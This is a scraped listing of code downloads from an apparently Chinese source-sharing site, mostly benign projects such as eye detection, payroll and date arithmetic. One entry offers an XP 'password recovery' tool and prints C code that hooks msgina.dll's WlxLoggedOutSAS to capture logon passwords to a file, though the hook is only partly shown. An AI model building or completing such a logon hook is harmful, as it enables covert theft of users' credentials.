-
eyedetection code which first detects a face ,then creates an roi near the eye r...
eyedetection code which first detects a face ,then creates an roi near the eye region and detects an eye.This uses the Haar classifiers in OPEN CV
- 2022-02-15 01:13:05下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
方便管理员工档案资料,以及自动计算工资,可以配合考勤机模块...
方便管理员工档案资料,以及自动计算工资,可以配合考勤机模块-Facilitate management of staff files, as well as automatic calculation of wages, be in line with the attendance machine module
- 2023-09-02 12:50:04下载
- 积分:1
-
QW2410开发套件wince的说明,附有详细的图片说明
QW2410开发套件wince的说明,附有详细的图片说明-QW2410 Development Kit wince note, accompanied by a detailed description of the picture
- 2022-02-09 13:59:57下载
- 积分:1
-
HFSS仿真的helix结构,以及结果照片
HFSS仿真的helix结构,以及结果照片-HFSS simulation of the helix structure
- 2022-06-02 09:21:20下载
- 积分:1
-
windows main 程序作为class 成员
的各种实例
windows main 程序作为class 成员
的各种实例-windows main proceedings as a member of the class examples
- 2022-12-22 07:15:03下载
- 积分:1
-
介绍在VC框架中,如何加入CanBus的实现方法,程序中用简单的红灯演示程序,展示了添加的过程。...
介绍在VC框架中,如何加入CanBus的实现方法,程序中用简单的红灯演示程序,展示了添加的过程。-introduced in VC framework, how to join the realization Canbus methods, and procedures used simple red demo program, and it demonstrated the added process.
- 2022-09-04 21:10:02下载
- 积分:1
-
C language bit manipulation application example, a brief description of how to o...
C语言位操作应用举例,简要说明在C语言中如何操作字节中的位-C language bit manipulation application example, a brief description of how to operate in the C language byte in bits
- 2022-01-24 16:12:19下载
- 积分:1
-
测试RGB三种不同值时的颜色值,方便观察需要设置的颜色.
测试RGB三种不同值时的颜色值,方便观察需要设置的颜色.-Test three different values of RGB color values, to facilitate observation of the need for color.
- 2022-03-20 21:49:34下载
- 积分:1
-
This example function is implemented using VC++6.0 calculate the time difference...
本例子功能是用VC++6.0实现的计算两个日期的时间差值的。在此只实现了计算两个日期的小时差,其它的分钟,秒,天数等类似可以实现。-This example function is implemented using VC++6.0 calculate the time difference between the two dates. This is only achieved two dates to calculate the hour difference, other minutes, seconds, the number of days and the like can be achieved.
- 2022-05-27 08:26:06下载
- 积分:1